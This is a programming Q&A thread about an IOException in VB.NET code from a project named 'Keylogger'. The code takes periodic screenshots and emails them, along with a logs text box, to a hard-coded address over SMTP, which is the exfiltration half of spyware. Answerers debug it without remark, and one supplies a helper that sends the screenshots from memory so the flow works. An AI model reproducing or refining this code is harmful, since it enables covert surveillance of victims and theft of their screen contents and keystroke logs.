# IOException was unhandled vb.net

Tags: vb.net, ioexception

When I run my program, it encounter with this error

```
The process cannot access the file 
'C:\Users\user\Documents\Visual Studio 2010\Projects\Keylogger\WindowsApplication1\bin\Debug\pic\img1.png' 
because it is being used by another process.
```

This error is for
    Dim attach As New Attachment(Application.StartupPath & "\pic\" & "\img" & i & ".png")

Can someone help me about it? Thanks in advance!

Here is my full code:

```
private j as integer = 1

Public Function TakeImage()
    Return TakeImage(0, 0, Screen.PrimaryScreen.WorkingArea.Width, Screen.PrimaryScreen.WorkingArea.Height)
End Function
Public Function TakeImage(ByVal X As Integer, ByVal Y As Integer, ByVal Width As Integer, ByVal Height As Integer)
    Dim Img As New Bitmap(Width, Height)
    Dim g As Graphics = Graphics.FromImage(Img)
    g.CopyFromScreen(X, Y, 0, 0, Img.Size)
    g.Dispose()

    Return Img
End Function

Private Sub tmrEmail_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles tmrEmail.Tick
    Dim i As Integer


    Dim smtpServer As New SmtpClient
    smtpServer.EnableSsl = True
    Dim mail As New MailMessage
    smtpServer.Credentials = New Net.NetworkCredential("********", "********")
    smtpServer.Port = 587
    smtpServer.Host = "smtp.mail.yahoo.com"
    mail = New MailMessage
    mail.From = New MailAddress("********")
    mail.To.Add("*********")
    mail.Subject = ("Parham")
    mail.Body = txtlogs.Text

    For i = 1 To 3

        Using fs As FileStream = New FileStream(Application.StartupPath & "\pic\" & "\img" & i & ".png", FileMode.Open)
            Dim attach As New Attachment(Application.StartupPath & "\pic\" & "\img" & i & ".png")
            mail.Attachments.Add(attach)
            smtpServer.Send(mail)
            If File.Exists(Application.StartupPath & "\pic\" & "\img" & j & ".png") Then
                File.Delete(Application.StartupPath & "\pic\" & "\img" & j & ".png")
            End If
        End Using
    Next

End Sub

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
    If Not Directory.Exists(Application.StartupPath & "\pic\") Then
        Directory.CreateDirectory(Application.StartupPath & "\pic\")
    End If

End Sub

Private Sub tmrScrShot_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles tmrScrShot.Tick
    Dim picture As Image = TakeImage()

    Using picture
        picture.Save(Application.StartupPath & "\pic\" & "\img" & j & ".png", System.Drawing.Imaging.ImageFormat.Png)
    End Using

    j += 1
    If j > 3 Then
        j = New Integer
        j = 1
    End If
End Sub
```

Comment: How do you load the Image? Please show the code of TakeImage()

Comment: Oh Ok sorry I forgot about that I'm gonna edit my code !

Comment: Not sure but I will try with `Using picture = TakeImage()`, also remove all that path concatenation and use Path.Combine. Last, there is a problem with your `j` variable. You send img+i but delete img+j

Comment: Yeah Because I want to make 3 picture in folder name "pic" but I cant rewrite it as the error "generic gdi+" will occur so I need to delete the pictures then save as new image.

Answer (score 1, accepted):

You should first set **Option Strict ON**, then fix the warnings and errors that will be shown and then edit your post to the actual code.

The cause of the exception is a timing problem between the tmrEmail Timer object and the tmrScrShot Timer object.

EDIT:

This  method takes a Image object which is then saved to a memory stream which is used to create a System.Net.Mail.Attachment

```
Private Function ToAttachment(img As Image) As System.Net.Mail.Attachment
    Dim attachment As System.Net.Mail.Attachment
    Using ms As New System.IO.MemoryStream()

        img.Save(ms, System.Drawing.Imaging.ImageFormat.Png)

        attachment = New System.Net.Mail.Attachment(New System.IO.MemoryStream(ms.GetBuffer), "image.png", "image/png")

    End Using

    Return attachment
End Function
```

Comment: I have already fixed the timing problem I think because tmrEmail.interval = 60000 and tmrScrShot.interval = 19000 is it ok?

Comment: You also need to take care of the time which is needed to save the image. So if saving takes 1 second and some milliseconds the last saving ( the third pic ) could take place at the time you want to add the image as attachment.

Comment: so is there any way that I can use instead of deleting the file ? because for rewriting the generic gdi+ error will occur!

Comment: How about avoiding the saving to a file and instead save it to a memory stream ?

Comment: Just have seen how you are sending the images.You create a MailMessage and then you do the for loop. Inside the for loop you add the first image to the message and send the message. Then you add the second image (now the message contains 2 images) and you send it again then on the last iteration you add the third image to the message which results in a message with 3 images which is sent.
**As a tip: redesign your application**.

Comment: That is also good idea but can you please help me about it because I don't know how to use memory stream.thank you